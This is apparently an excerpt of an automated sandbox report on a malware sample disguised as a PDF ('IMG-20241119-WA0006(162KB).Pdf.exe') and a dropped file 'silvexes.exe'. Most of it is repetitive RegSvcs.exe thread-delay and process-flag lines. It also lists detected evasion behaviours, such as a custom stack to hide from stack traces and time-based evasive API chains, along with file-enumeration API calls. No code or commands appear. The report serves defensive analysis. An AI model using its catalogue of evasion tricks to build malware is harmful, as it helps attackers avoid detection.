Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	API/Special instruction interceptor: Address: 14D7D94
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	API/Special instruction interceptor: Address: 115E874

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598325	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595994	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595323	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595182	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594403	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595951	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7665	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2175	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8038	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1814	Jump to behavior

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Evaded block: after key decision	graph_0-94590
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Evaded block: after key decision
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Evaded block: after key decision

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-95103
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	API coverage: 4.3 %
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	API coverage: 4.7 %

Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000C6CA9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_000C60DD
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_000C63F9
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000CEB60
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CF56F FindFirstFileW,FindClose,	0_2_000CF56F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000CF5FA
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1B2F
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1C8A
Source: C:\Users\user\Desktop\IMG-20241119-WA0006(162KB).Pdf.exe	Code function: 0_2_000D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000D1F94
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00BF6CA9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	1_2_00BF60DD
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	1_2_00BF63F9
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_00BFEB60
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_00BFF5FA
Source: C:\Users\user\AppData\Local\Wausaukee\silvexes.exe	Code function: 1_2_00BFF56F FindFirstFileW,FindClose,	1_2_00BFF56F
